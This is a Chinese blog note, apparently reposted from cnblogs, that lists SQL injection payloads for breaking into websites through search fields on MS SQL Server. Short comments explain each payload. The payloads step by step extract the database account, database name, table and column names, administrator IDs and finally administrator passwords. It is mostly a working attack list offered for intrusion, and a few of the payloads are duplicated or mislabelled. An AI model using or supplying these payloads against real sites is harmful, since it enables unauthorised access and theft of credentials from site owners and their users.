zoukankan      html  css  js  c++  java
  • 网站入侵注入的几种方法总结【笔记】

         搜索型注入的暴库语句

         %'and user>0 and '%'=' //得到当前数据库账号     
         %'and db_name()>0 and '%'=' //得到当前数据库名  
         %'and (select count(*) from admin)>0 and '%'=' //返回错误页面,就说明没有admin这个表
         %'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0)>0 and '%'=' //得到当前数据库的第一个表名
    
          %'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange'))>0 and '%'=' //得到当前数据库的第二个表名
          %'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange','oldpoint'))>0 and '%'=' //得到当前数据库的第三个表名
    

      

           当猜到tbl_admin这个表名的时候
         

     %'and (select top 1 col_name(object_id ('tbl_admin'),1) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里的第一个列名c_employee_id
          %'and (select top 1 col_name(object_id ('tbl_admin'),2) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里的第二个列名c_employee_name
          %'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里的第三个列名c_password
          %'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里的第四个列名c_level
        %'and (select top 1 c_employee_id from tbl_admin)>0 and '%'=' //得到第一个管理员的id
        %'and (select c_employee_id from(select top 1 * from(select top 2 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第二个管理员的id
        %'and (select c_employee_id from(select top 1 * from(select top 3 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第三个管理员的id
        %'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第四个管理员的id
         %'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第五个管理员的id
        c%'and (select top 1 c_c_password from tbl_admin)>0 and '%'=' //这个语句是暴出管理员密码
    

      

  • 相关阅读:
    强连通分量
    mysql安装图解 mysql图文安装教程(详细说明)
    MeshCombineUtility.cs method `GetTriangleStrip' of type `UnityEngine.Mesh' could be found
    socket网络编程之一:客户端和服务器端接口函数
    unity3D——登录界面
    Ionic学习注意事项01
    这里我将分享我学到的几种ionic登陆界面
    关于ionic基础教程的学习网址
    Windows下配置Git
    Cocos网络篇[3.2](3) ——Socket连接(1)
  • 原文地址:https://www.cnblogs.com/68xi/p/9328010.html
Copyright © 2011-2022 走看看